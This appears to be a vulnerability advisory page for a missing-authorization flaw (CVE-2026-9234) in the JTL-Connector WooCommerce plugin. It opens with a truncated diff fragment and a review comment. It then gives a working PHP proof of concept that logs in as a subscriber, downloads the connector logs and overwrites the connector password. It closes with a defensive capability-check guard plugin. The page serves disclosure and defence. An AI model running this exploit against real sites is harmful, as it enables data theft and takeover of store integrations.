                    target="_blank"><?php print __(
                        'JTL-Guide',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>


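Review bot: the JTL-Guide anchor opens an external site with target="_blank" and no rel attribute. Add rel="noopener noreferrer" so the opened page gets no window.opener handle to the admin screen and no referrer carrying the wp-admin URL.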
@@ -1829,7 +1835,7 @@

         if (!is_string($installed_version)) {
             throw new InvalidArgumentException(
-                "Expected installed_version to be a string, got " . gettype($instal

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-9234 - JTL-Connector for WooCommerce <= 2.4.1 - Missing Authorization

$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'subscriber';            // Change to a valid subscriber username
$password = 'password';              // Change to the subscriber's password

// Step 1: Log in to get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);

// Step 2: Download JTL connector logs (AJAX handler - no nonce needed)
$ajax_log_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = [
    'action' => 'downloadJTLLogs'
];

curl_setopt($ch, CURLOPT_URL, $ajax_log_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$logs_response = curl_exec($ch);

if (strlen($logs_response) > 100) {
    echo "[+] Logs downloaded successfully!\n";
    echo "[+] Logs size: " . strlen($logs_response) . " bytes\n";
    file_put_contents('jtl_logs.zip', $logs_response);
    echo "[+] Logs saved to jtl_logs.zip\n";
} else {
    echo "[!] No logs downloaded or endpoint not accessible.\n";
    echo "[!] Response: " . $logs_response . "\n";
}

// Step 3: Modify plugin settings (admin-post handler - no capability check)
$admin_post_url = $target_url . '/wp-admin/admin-post.php';
$settings_data = [
    'action' => 'settings_save_woo-jtl-connector',
    // Example: change connector password to attacker-controlled value
    'connector_password' => 'attacker_controlled_password'
];

curl_setopt($ch, CURLOPT_URL, $admin_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$settings_response = curl_exec($ch);

echo "[+] Settings modification attempted. Check if connector password changed.\n";

curl_close($ch);
unlink('/tmp/cookies.txt');
?>
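
Interim mitigation for the three handlers the PoC above exercises, for sites that cannot move to 2.4.2 right away. This is an added example, not the vendor's patch: the jtl_guard_* names are hypothetical, and the manage_options capability is an assumption because the page does not say which capability 2.4.2 enforces.

```php
<?php
/**
 * Plugin Name: JTL-Connector handler guard (interim mitigation)
 *
 * Added example, not code from the JTL-Connector 2.4.2 patch. Intended for
 * wp-content/mu-plugins/ on a site that still runs version 2.4.1 or older.
 */

defined('ABSPATH') || exit;

// Assumption: only administrators may reach these handlers. The advisory
// does not say which capability 2.4.2 enforces, so adjust this if needed.
const JTL_GUARD_CAPABILITY = 'manage_options';

// The three hooks the advisory lists as missing an authorization check.
const JTL_GUARD_HOOKS = [
    'admin_post_settings_save_woo-jtl-connector',
    'wp_ajax_downloadJTLLogs',
    'wp_ajax_clearJTLLogs',
];

/**
 * Runs ahead of the plugin's own callback and ends the request with
 * HTTP 403 when the logged-in user lacks the required capability.
 */
function jtl_guard_require_capability(): void
{
    if (current_user_can(JTL_GUARD_CAPABILITY)) {
        return; // Authorized: the plugin's handler runs as usual.
    }

    // Leave a trace for detection: which user tried which hook.
    error_log(sprintf(
        'jtl-guard: blocked %s for user id %d from %s',
        current_action(),
        get_current_user_id(),
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));

    wp_die('You are not allowed to perform this action.', '', ['response' => 403]);
}

foreach (JTL_GUARD_HOOKS as $hook) {
    // PHP_INT_MIN is the earliest priority, so the guard runs before any
    // callback the plugin registered at a later (higher) priority.
    add_action($hook, 'jtl_guard_require_capability', PHP_INT_MIN);
}
```

The guard closes only the Subscriber+ path described in the advisory; the nonce check on the settings form arrives with the 2.4.2 update.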
